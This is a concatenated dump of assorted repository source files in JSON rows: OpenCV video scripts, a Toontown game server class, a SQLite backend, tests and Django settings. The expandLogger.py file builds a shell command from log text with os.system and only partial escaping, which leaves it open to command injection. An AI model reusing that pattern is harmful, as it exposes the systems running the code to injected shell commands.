Now convert median frame to grayscale\ngray_median_frame = cv2.cvtColor(median_frame, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('Gray Scale Image', gray_median_frame)\ncv2.waitKey(0)\n\nwhile(ret_val):\n\n\t# Read the current frame\n\tret, frame = captured_video.read()\n\n\tif frame is not None:\n\t\t# Convert the current frame to grayscale\n\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\t# Calculate absolute difference of current frame and the median frame\n\t\tdiff_frame = cv2.absdiff(frame, gray_median_frame)\n\n\t\t# Threshold to binarize\n\t\tth, diff_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)\n\n\t\t# Display the final image\n\t\t# cv2.imshow('Temp Frames',frame)\n\t\tcv2.imshow('Difference Frames', diff_frame)\n\t\tcv2.waitKey(20)\ncv2.waitKey(0)\n# Release VideoCapture object \ncaptured_video.release()\n\n# Close all Windows\ncv2.destroyAllWindows()"},"size":{"kind":"number","value":2503,"string":"2,503"}}},{"rowIdx":862,"cells":{"max_stars_repo_path":{"kind":"string","value":"scripts/create_test_data_file_from_bt.py"},"max_stars_repo_name":{"kind":"string","value":"roger-/pyzephyr"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2022800"},"content":{"kind":"string","value":"\nimport serial\nimport time\nimport platform\nimport csv\n\nimport zephyr.protocol\n\ndef main():\n serial_port_dict = {\"Darwin\": \"/dev/cu.BHBHT001931-iSerialPort1\",\n 
\"Windows\": 23}\n \n serial_port = serial_port_dict[platform.system()]\n ser = serial.Serial(serial_port)\n \n callback = lambda x: None\n protocol = zephyr.protocol.BioHarnessProtocol(ser, callback, \"../test_data/120-second-bt-stream\")\n protocol.enable_periodic_packets()\n \n start_time = time.time()\n while time.time() < start_time + 120:\n protocol.read_and_handle_bytes(1)\n\n\nif __name__ == \"__main__\":\n main()\n"},"size":{"kind":"number","value":630,"string":"630"}}},{"rowIdx":863,"cells":{"max_stars_repo_path":{"kind":"string","value":"toontown/hood/GSHoodAI.py"},"max_stars_repo_name":{"kind":"string","value":"journeyfan/toontown-journey"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024433"},"content":{"kind":"string","value":"from toontown.classicchars import DistributedGoofySpeedwayAI\nfrom libpandadna import DNAGroup, DNAVisGroup\nfrom toontown.hood import HoodAI\nfrom toontown.hood import ZoneUtil\nfrom toontown.racing import RaceGlobals\nfrom toontown.racing.DistributedRacePadAI import DistributedRacePadAI\nfrom toontown.racing.DistributedStartingBlockAI import DistributedStartingBlockAI\nfrom toontown.racing.DistributedViewPadAI import DistributedViewPadAI\nfrom toontown.racing.DistributedStartingBlockAI import DistributedViewingBlockAI\nfrom toontown.toonbase import ToontownGlobals\n\n\nclass GSHoodAI(HoodAI.HoodAI):\n def __init__(self, air):\n HoodAI.HoodAI.__init__(self, air,\n ToontownGlobals.GoofySpeedway,\n ToontownGlobals.GoofySpeedway)\n\n self.racingPads = []\n self.viewingPads = []\n self.viewingBlocks = []\n self.startingBlocks = []\n self.leaderBoards = []\n self.classicChar = None\n\n self.startup()\n\n def startup(self):\n HoodAI.HoodAI.startup(self)\n\n self.createStartingBlocks()\n self.createLeaderBoards()\n self.cycleLeaderBoards()\n if simbase.config.GetBool('want-goofy', True):\n self.createClassicChar()\n\n def shutdown(self):\n HoodAI.HoodAI.shutdown(self)\n\n taskMgr.removeTasksMatching('leaderBoardSwitch')\n for board in self.leaderBoards:\n board.delete()\n del self.leaderBoards\n\n def findRacingPads(self, dnaGroup, zoneId, area, padType='racing_pad'):\n racingPads = []\n racingPadGroups = []\n if isinstance(dnaGroup, DNAGroup) and (padType in dnaGroup.getName()):\n racingPadGroups.append(dnaGroup)\n\n if padType == 'racing_pad':\n nameInfo = dnaGroup.getName().split('_')\n racingPad = DistributedRacePadAI(simbase.air)\n racingPad.setArea(zoneId)\n racingPad.nameType = nameInfo[3]\n racingPad.index = int(nameInfo[2])\n nextRaceInfo = RaceGlobals.getNextRaceInfo(-1, racingPad.nameType, racingPad.index)\n racingPad.setTrackInfo([nextRaceInfo[0], nextRaceInfo[1]])\n racingPad.generateWithRequired(zoneId)\n elif padType == 'viewing_pad':\n racingPad = DistributedViewPadAI(simbase.air)\n racingPad.setArea(zoneId)\n racingPad.generateWithRequired(zoneId)\n else:\n self.notify.error('Invalid racing pad type: ' + padType)\n\n racingPads.append(racingPad)\n elif isinstance(dnaGroup, DNAVisGroup):\n zoneId = ZoneUtil.getTrueZoneId(int(dnaGroup.getName().split(':')[0]), zoneId)\n for i in range(dnaGroup.getNumChildren()):\n (foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaGroup.at(i), zoneId, area, padType=padType)\n racingPads.extend(foundRacingPads)\n racingPadGroups.extend(foundRacingPadGroups)\n return (racingPads, racingPadGroups)\n\n def findStartingBlocks(self, dnaGroup, racePad):\n startingBlocks = []\n if isinstance(dnaGroup, DNAGroup) and ('starting_block' in dnaGroup.getName()):\n 
x, y, z = dnaGroup.getPos()\n h, p, r = dnaGroup.getHpr()\n if isinstance(racePad, DistributedRacePadAI):\n startingBlock = DistributedStartingBlockAI(simbase.air)\n elif isinstance(racePad, DistributedViewPadAI):\n startingBlock = DistributedViewingBlockAI(simbase.air)\n else:\n self.notify.error('Unknown starting block type.')\n startingBlock.setPosHpr(x, y, z, h, p, r)\n startingBlock.setPadDoId(racePad.doId)\n startingBlock.setPadLocationId(getattr(racePad, 'index', 0))\n startingBlock.generateWithRequired(racePad.zoneId)\n\n startingBlocks.append(startingBlock)\n for i in range(dnaGroup.getNumChildren()):\n foundStartingBlocks = self.findStartingBlocks(dnaGroup.at(i), racePad)\n startingBlocks.extend(foundStartingBlocks)\n return startingBlocks\n\n def createStartingBlocks(self):\n self.racingPads = []\n self.viewingPads = []\n racingPadGroups = []\n viewingPadGroups = []\n for zoneId in self.getZoneTable():\n dnaData = self.air.dnaDataMap.get(zoneId, None)\n zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)\n if dnaData.getName() == 'root':\n area = ZoneUtil.getCanonicalZoneId(zoneId)\n (foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='racing_pad')\n (foundViewingPads, foundViewingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='viewing_pad')\n self.racingPads.extend(foundRacingPads)\n racingPadGroups.extend(foundRacingPadGroups)\n self.viewingPads.extend(foundViewingPads)\n viewingPadGroups.extend(foundViewingPadGroups)\n self.startingBlocks = []\n for (dnaGroup, racePad) in zip(racingPadGroups, self.racingPads):\n foundStartingBlocks = self.findStartingBlocks(dnaGroup, racePad)\n self.startingBlocks.extend(foundStartingBlocks)\n for startingBlock in foundStartingBlocks:\n racePad.addStartingBlock(startingBlock)\n self.viewingBlocks = []\n for (dnaGroup, viewPad) in zip(viewingPadGroups, self.viewingPads):\n foundViewingBlocks = self.findStartingBlocks(dnaGroup, viewPad)\n self.viewingBlocks.extend(foundViewingBlocks)\n for viewingBlock in foundViewingBlocks:\n viewPad.addStartingBlock(viewingBlock)\n\n def findLeaderBoards(self, dnaData, zoneId):\n return [] # TODO\n\n def createLeaderBoards(self):\n self.leaderBoards = []\n dnaData = self.air.dnaDataMap[self.zoneId]\n if dnaData.getName() == 'root':\n self.leaderBoards = self.findLeaderBoards(dnaData, self.zoneId)\n for leaderBoard in self.leaderBoards:\n if not leaderBoard:\n continue\n if 'city' in leaderBoard.getName():\n leaderBoardType = 'city'\n elif 'stadium' in leaderBoard.getName():\n leaderBoardType = 'stadium'\n elif 'country' in leaderBoard.getName():\n leaderBoardType = 'country'\n for subscription in RaceGlobals.LBSubscription[leaderBoardType]:\n leaderBoard.subscribeTo(subscription)\n\n def cycleLeaderBoards(self, task=None):\n messenger.send('leaderBoardSwap-' + str(self.zoneId))\n taskMgr.doMethodLater(10, self.cycleLeaderBoards, 'leaderBoardSwitch')\n\n def createClassicChar(self):\n self.classicChar = DistributedGoofySpeedwayAI.DistributedGoofySpeedwayAI(self.air)\n self.classicChar.generateWithRequired(self.zoneId)\n self.classicChar.start()\n"},"size":{"kind":"number","value":7008,"string":"7,008"}}},{"rowIdx":864,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend.py"},"max_stars_repo_name":{"kind":"string","value":"mohitroutela/library-management-system-using-tkinter"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023843"},"content":{"kind":"string","value":"import sqlite3 \ndef 
connect():\n\t'''it is used to connect to the database books'''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"CREATE TABLE IF NOT EXISTS book(id integer PRIMARY KEY,title text,author text,year text,isbn integer)\")\n\tconn.commit()\n\tconn.close()\ndef insert(title,author,year,isbn):\n\t''' it is used to inset into the database '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"INSERT INTO book values (Null,?,?,?,?)\",(title,author,year,isbn))\n\tconn.commit()\n\tconn.close()\n\ndef view():\n\t''' it is used to view all the enteries in the book table of a books database '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT * FROM book\")\n\trows=cur.fetchall()\n\tconn.close()\n\treturn rows\n\ndef search(title=\"\",author=\"\",year=\"\",isbn=\"\"):\n\t''' it is used to search the entries\n\t null string are passed so that user can select any one of them '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT * FROM book where title=? or author=? or year=? or isbn=?\",(title,author,year,isbn))\n\tconn.commit()\n\trows=cur.fetchall()\n\tconn.close()\n\treturn rows\n\ndef update(id,title,author,year,isbn):\n\t''' it updates the values according to the id selected in the user interface '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"UPDATE book SET title=?,author=?,year=?,isbn=? where id=?\",(title,author,year,isbn,id))\n\tconn.commit()\n\tconn.close()\n\ndef delete(id):\n\t''' deletes according to the id selected'''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"DELETE FROM book WHERE id=?\",(id,)) #(id,) commas has been used besides id so that it is passed as a tuple\n\tconn.commit()\n\tconn.close()\ndef delete_all():\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"DELETE FROM book\")\n\tconn.commit()\n\tconn.close()\n\n"},"size":{"kind":"number","value":1847,"string":"1,847"}}},{"rowIdx":865,"cells":{"max_stars_repo_path":{"kind":"string","value":"gpvdm_gui/gui/lasers.py"},"max_stars_repo_name":{"kind":"string","value":"roderickmackenzie/gpvdm"},"max_stars_count":{"kind":"number","value":12,"string":"12"},"id":{"kind":"string","value":"2022876"},"content":{"kind":"string","value":"#\n# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall\n# model for 1st, 2nd and 3rd generation solar cells.\n# Copyright (C) 2008-2022 r.. at googlemail.com\n# \n# https://www.gpvdm.com\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License v2.0, as published by\n# the Free Software Foundation.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n# \n\n## @package lasers\n# Main laser editor window.\n#\n\nimport os\nimport webbrowser\nfrom tab import tab_class\nfrom icon_lib import icon_get\n\nimport i18n\n_ = i18n.language.gettext\n\n#qt\nfrom PyQt5.QtWidgets import QMainWindow, QTextEdit, QAction, QApplication\nfrom PyQt5.QtGui import QIcon, QPainter, QFont, QColor\nfrom PyQt5.QtCore import QSize, Qt\nfrom PyQt5.QtWidgets import QWidget,QSizePolicy,QVBoxLayout,QPushButton,QDialog,QFileDialog,QToolBar,QLabel,QComboBox, QTabWidget,QStatusBar,QMenuBar, QTabBar, QStylePainter, QStyleOptionTab,QStyle\n\n#window\nfrom gui_util import yes_no_dlg\nfrom gui_util import dlg_get_text\nfrom util import wrap_text\n\nfrom QWidgetSavePos import QWidgetSavePos\nfrom cal_path import get_sim_path\n\nfrom css import css_apply\n\nfrom experiment import experiment\n\nclass lasers(experiment):\n\n\n\tdef __init__(self,data=None):\n\t\texperiment.__init__(self,window_save_name=\"laser_editor\", window_title=_(\"Laser editor\"),name_of_tab_class=\"jvexperiment_tab\",json_search_path=\"gpvdm_data().lasers\")\n\t\tself.notebook.currentChanged.connect(self.switch_page)\n\t\t#self.ribbon.tb_save.setVisible(False)\n\t\tself.switch_page()\n\n\tdef switch_page(self):\n\t\ttab = self.notebook.currentWidget()\n\t\t#self.tb_lasers.update(tab.data)\n\n\n"},"size":{"kind":"number","value":2151,"string":"2,151"}}},{"rowIdx":866,"cells":{"max_stars_repo_path":{"kind":"string","value":"server/src/expandLogger.py"},"max_stars_repo_name":{"kind":"string","value":"leonard-thong/dlwlrat"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2024407"},"content":{"kind":"string","value":"# -*- coding:utf-8 -*-\n\"\"\"\n===========================================\n @author: lmy\n @time: 2020/8/11 5:54 PM\n @project: brat\n @file: expandLogger.py\n===========================================\n\"\"\"\nimport sys\nimport os\n\nEXCEPTION = \"\\n\\033[95mEXCEPTION: \"\nOKBLUE = \"\\n\\033[94m\"\nOKGREEN = \"\\n\\033[92m\"\nWARNING = \"\\033[93mWARNING: \"\nERROR = \"\\n\\033[91mERROR: \"\nENDC = \"\\033[0m\"\n\n\nclass Logger(object):\n # def __init__(self, file_path):\n # self.file_path = file_path\n # self.f_out = open(self.file_path, \"a\", encoding=\"utf8\")\n\n # def __del__(self):\n # self.f_out.close()\n\n # def log(self, content):\n # self.f_out.write(content)\n\n @staticmethod\n def print(content):\n os.system(\"echo \" + \"'\" + content.__str__().replace(' ', '\\ ').replace('(','\\(').replace(')','\\)').replace('&','\\&') + \"'\")\n\n def log_normal(self, log):\n self.print(OKGREEN + \"RUNNING LOG: \" + log.__str__() + ENDC)\n\n def log_warning(self, log):\n self.print(WARNING + log.__str__() + ENDC)\n\n def log_error(self, log):\n self.print(ERROR + log.__str__() + ENDC)\n\n def log_exception(self, log):\n self.print(EXCEPTION + log.__str__() + ENDC)\n\n def log_custom(self, style, log):\n self.print(style + log.__str__() + ENDC)\n\n\nif __name__ == \"__main__\":\n logger = Logger()\n logger.log_warning(\"THIS IS A TEST MESSAGE\")\n logger.log_normal(\"THIS IS A TEST MESSAGE\")\n logger.log_error(\"THIS IS A TEST 
MESSAGE\")\n"},"size":{"kind":"number","value":1485,"string":"1,485"}}},{"rowIdx":867,"cells":{"max_stars_repo_path":{"kind":"string","value":"demandCustomize/cloudPlatform/migrations/0004_auto_20170516_1716.py"},"max_stars_repo_name":{"kind":"string","value":"liushouyun/equipment"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024296"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.10.4 on 2017-05-16 17:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cloudPlatform', '0003_auto_20170512_1926'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='demandtemplate',\n name='StartMethodNode',\n field=models.IntegerField(default=0),\n ),\n migrations.AlterField(\n model_name='demandtemplatenode',\n name='DemandTemplate_DemandTemplateID',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='cloudPlatform.DemandTemplate'),\n ),\n ]\n"},"size":{"kind":"number","value":762,"string":"762"}}},{"rowIdx":868,"cells":{"max_stars_repo_path":{"kind":"string","value":"qf_lib_tests/integration_tests/data_providers/test_cryptocurrency_provider.py"},"max_stars_repo_name":{"kind":"string","value":"webclinic017/qf-lib"},"max_stars_count":{"kind":"number","value":198,"string":"198"},"id":{"kind":"string","value":"2024388"},"content":{"kind":"string","value":"# Copyright 2016-present CERN – European Organization for Nuclear Research\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nimport pandas as pd\n\nfrom qf_lib.common.enums.frequency import Frequency\nfrom qf_lib.common.enums.price_field import PriceField\nfrom qf_lib.common.tickers.tickers import CcyTicker\nfrom qf_lib.common.utils.dateutils.string_to_date import str_to_date\nfrom qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame\nfrom qf_lib.containers.dataframe.qf_dataframe import QFDataFrame\nfrom qf_lib.containers.qf_data_array import QFDataArray\nfrom qf_lib.containers.series.prices_series import PricesSeries\nfrom qf_lib.containers.series.qf_series import QFSeries\nfrom qf_lib.data_providers.cryptocurrency.cryptocurrency_data_provider import CryptoCurrencyDataProvider\n\n\n@unittest.skip(\"CryptoCurrencyDataProvider needs update\")\nclass TestCryptoCurrency(unittest.TestCase):\n START_DATE = str_to_date('2016-01-01')\n END_DATE = str_to_date('2017-02-02')\n SINGLE_FIELD = 'Close'\n MANY_FIELDS = ['Open', 'Volume', 'Close']\n\n SINGLE_TICKER = CcyTicker('Bitcoin')\n MANY_TICKERS = [CcyTicker('Bitcoin'), CcyTicker('Ethereum'), CcyTicker('Ripple')]\n NUM_OF_DATES = 399\n\n SINGLE_PRICE_FIELD = PriceField.Close\n MANY_PRICE_FIELDS = [PriceField.Close, PriceField.Open, PriceField.High]\n\n def setUp(self):\n self.cryptocurrency_provider = CryptoCurrencyDataProvider()\n\n # =========================== Test get_price method 
==========================================================\n\n def test_price_single_ticker_single_field(self):\n # single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None\n data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.SINGLE_PRICE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertIsInstance(data, PricesSeries)\n self.assertEqual(len(data), self.NUM_OF_DATES)\n self.assertEqual(data.name, self.SINGLE_TICKER.as_string())\n\n def test_price_single_ticker_multiple_fields(self):\n # single ticker, many fields; can be the same as for single field???\n data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.MANY_PRICE_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertEqual(type(data), PricesDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_PRICE_FIELDS)))\n self.assertEqual(list(data.columns), self.MANY_PRICE_FIELDS)\n\n def test_price_multiple_tickers_single_field(self):\n data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.SINGLE_PRICE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n self.assertEqual(type(data), PricesDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))\n self.assertEqual(list(data.columns), self.MANY_TICKERS)\n\n def test_price_multiple_tickers_multiple_fields(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.MANY_PRICE_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertEqual(type(data), QFDataArray)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_PRICE_FIELDS)))\n self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)\n self.assertEqual(list(data.tickers), self.MANY_TICKERS)\n self.assertEqual(list(data.fields), self.MANY_PRICE_FIELDS)\n\n # =========================== Test get_history method ==========================================================\n\n def test_historical_single_ticker_single_field(self):\n # single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None\n data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.SINGLE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertIsInstance(data, QFSeries)\n self.assertEqual(len(data), self.NUM_OF_DATES)\n self.assertEqual(data.name, self.SINGLE_TICKER.as_string())\n\n def test_historical_single_ticker_multiple_fields(self):\n # single ticker, many fields; can be the same as for single field???\n data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.MANY_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_FIELDS)))\n self.assertEqual(list(data.columns), self.MANY_FIELDS)\n\n def test_historical_multiple_tickers_single_field(self):\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.SINGLE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, 
len(self.MANY_TICKERS)))\n self.assertEqual(list(data.columns), self.MANY_TICKERS)\n\n def test_historical_multiple_tickers_multiple_fields_one_date(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,\n start_date=self.END_DATE, end_date=self.END_DATE)\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (len(self.MANY_TICKERS), len(self.MANY_FIELDS)))\n self.assertEqual(list(data.index), self.MANY_TICKERS)\n self.assertEqual(list(data.columns), self.MANY_FIELDS)\n\n def test_historical_multiple_tickers_multiple_fields_many_dates(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE)\n self.assertEqual(type(data), QFDataArray)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_FIELDS)))\n self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)\n self.assertEqual(list(data.tickers), self.MANY_TICKERS)\n self.assertEqual(list(data.fields), self.MANY_FIELDS)\n\n\nif __name__ == '__main__':\n unittest.main()\n"},"size":{"kind":"number","value":7828,"string":"7,828"}}},{"rowIdx":869,"cells":{"max_stars_repo_path":{"kind":"string","value":"python-package/test/plot/test_aes.py"},"max_stars_repo_name":{"kind":"string","value":"OLarionova-HORIS/lets-plot"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023098"},"content":{"kind":"string","value":"#\n# Copyright (c) 2019. JetBrains s.r.o.\n# Use of this source code is governed by the MIT license that can be found in the LICENSE file.\n#\nimport pytest\n\nimport lets_plot as gg\n\n\nclass TestWithListArgs:\n result_empty = {'x': None, 'y': None}\n result_xy = {'x': 'xVar', 'y': 'yVar'}\n\n @pytest.mark.parametrize('args,expected', [\n ([], result_empty),\n (['xVar', 'yVar'], result_xy),\n ])\n def test_aes(self, args, expected):\n spec = gg.aes(*args)\n assert spec.as_dict() == expected\n\n\nclass TestWithDictArgs:\n result_kwargs = {'x': 'xVar', 'y': 'yVar', 'size': 'sizeVar'}\n\n @pytest.mark.parametrize('args,expected', [\n (result_kwargs, result_kwargs),\n ])\n def test_aes(self, args, expected):\n spec = gg.aes(**args)\n assert spec.as_dict() == expected\n"},"size":{"kind":"number","value":822,"string":"822"}}},{"rowIdx":870,"cells":{"max_stars_repo_path":{"kind":"string","value":"pytest_django_test/settings_sqlite_file.py"},"max_stars_repo_name":{"kind":"string","value":"lendingloop/pytest-django"},"max_stars_count":{"kind":"number","value":5079,"string":"5,079"},"id":{"kind":"string","value":"2022852"},"content":{"kind":"string","value":"import tempfile\n\nfrom .settings_base import * # noqa: F401 F403\n\n# This is a SQLite configuration, which uses a file based database for\n# tests (via setting TEST_NAME / TEST['NAME']).\n\n# The name as expected / used by Django/pytest_django (tests/db_helpers.py).\n_fd, _filename = tempfile.mkstemp(prefix=\"test_\")\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \"/pytest_django_should_never_get_accessed\",\n \"TEST\": {\"NAME\": _filename},\n 
}\n}\n"},"size":{"kind":"number","value":498,"string":"498"}}},{"rowIdx":871,"cells":{"max_stars_repo_path":{"kind":"string","value":"automated_correction_module/word_seg_try.py"},"max_stars_repo_name":{"kind":"string","value":"anaghrao-99/Digital-Portal-for-Schools"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024096"},"content":{"kind":"string","value":"#grayscale\nimport numpy as np\nimport cv2\n\nimport imutils\nfrom imutils import contours\n\nimport sys \nimport subprocess\nimport os\nfrom pathlib import Path \n\nfilename_input = sys.argv[1]\n\ndef erode_image(filename):\n \n img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\n\n # increase contrast\n pxmin = np.min(img)\n pxmax = np.max(img)\n imgContrast = (img - pxmin) / (pxmax - pxmin) * 255\n\n # increase line width\n kernel = np.ones((4, 4), np.uint8)\n imgMorph = cv2.erode(imgContrast, kernel, iterations = 2)\n\n # write\n cv2.imwrite(filename, imgMorph)\n\n\n\ndef get_contour_precedence(contour, cols):\n origin = cv2.boundingRect(contour)\n return origin[1] * cols + origin[0]\n\n\n\n\nimage = cv2.imread(filename_input)\n\n# image = cv2.imread(filename)\n\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n# cv2.imshow('gray',gray)\n# cv2.waitKey(0)\n\n#binary\nret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n\n\n#dilation\nkernel = np.ones((5, 100), np.uint8)\n\n\nimg_dilation = cv2.dilate(thresh, kernel, iterations=5)\n\n\n#find contours im2\nctrs, hier = cv2.findContours(img_dilation.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n\n\n#sort contours\n# sorted_ctrs = sorted(ctrs, key=lambda ctr:get_contour_precedence(ctr, img_dilation.shape[1]))\nfor ctr in ctrs :\n\tx, y, w, h = cv2.boundingRect(ctr)\n\n\nsorted_ctrs = sorted(ctrs, key=lambda ctr: get_contour_precedence(ctr, img_dilation.shape[1]))\n\n# sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[0] + cv2.boundingRect(ctr)[1] * image.shape[1] )\npath = os.path.abspath(os.getcwd()) + '/out_test/'\nif(os.path.exists(path)):\n\n for f in Path(path).glob('*.png'):\n f.unlink()\n\n\nfor i, ctr in enumerate(sorted_ctrs):\n # Get bounding box\n\n x, y, w, h = cv2.boundingRect(ctr)\n\n # Getting ROI\n roi = image[y:y+h, x:x+w]\n\n # show ROI\n #print('segment no:' + str(i))\n # cv2.imshow('segment no:'+str(i),roi)\n string = 'out_test/'\n\n string+= str(i)\n string += '.png'\n # initial_directory = os.path.abspath(os.getcwd())\n\n cv2.imwrite(string, roi)\n # erode_image(string)\n # cv2.imshow(roi)\n cv2.rectangle( image,(x,y),( x + w, y + h ),(90,0,255),2)\n # cv2.waitKey(0)\n\n\n\n# pipe = subprocess.check_call([\"python\", filename])\n\nprint(\"Splitting into lines is over\")\n\n"},"size":{"kind":"number","value":2296,"string":"2,296"}}},{"rowIdx":872,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/providers/api/modules/etlMods.py"},"max_stars_repo_name":{"kind":"string","value":"9LKQ7ZLC82/cccatalog"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024500"},"content":{"kind":"string","value":"import logging\nimport os\nimport re\nimport requests\nimport time\nimport json\nimport argparse\nimport random\nfrom datetime import datetime, timedelta\n\nPATH = os.environ['OUTPUT_DIR']\n\ndef writeToFile(_data, _name):\n outputFile = '{}{}'.format(PATH, _name)\n\n if len(_data) < 1:\n return None\n\n logging.info('Writing to file => {}'.format(outputFile))\n\n with open(outputFile, 'a') as fh:\n for line in _data:\n if line:\n 
fh.write('\\t'.join(line) + '\\n')\n\n\ndef sanitizeString(_data):\n if _data is None:\n return ''\n\n _data = _data.strip()\n _data = _data.replace('\"', \"'\")\n _data = re.sub(r'\\n|\\r', ' ', _data)\n\n return re.sub(r'\\s+', ' ', _data)\n\n\ndef delayProcessing(_startTime, _maxDelay):\n minDelay = 1.0\n\n #subtract time elapsed from the requested delay\n elapsed = float(time.time()) - float(_startTime)\n delayInterval = round(_maxDelay - elapsed, 3)\n waitTime = max(minDelay, delayInterval) #time delay between requests.\n\n logging.info('Time delay: {} second(s)'.format(waitTime))\n time.sleep(waitTime)\n\n\ndef requestContent(_url):\n logging.info('Processing request: {}'.format(_url))\n\n try:\n response = requests.get(_url)\n\n if response.status_code == requests.codes.ok:\n return response.json()\n else:\n logging.warning('Unable to request URL: {}. Status code: {}'.format(url, response.status_code))\n return None\n\n except Exception as e:\n logging.error('There was an error with the request.')\n logging.info('{}: {}'.format(type(e).__name__, e))\n return None\n"},"size":{"kind":"number","value":1643,"string":"1,643"}}},{"rowIdx":873,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend/api/serializers/model_year_report_make.py"},"max_stars_repo_name":{"kind":"string","value":"kuanfandevops/zeva"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023115"},"content":{"kind":"string","value":"from rest_framework.serializers import ModelSerializer\n\nfrom 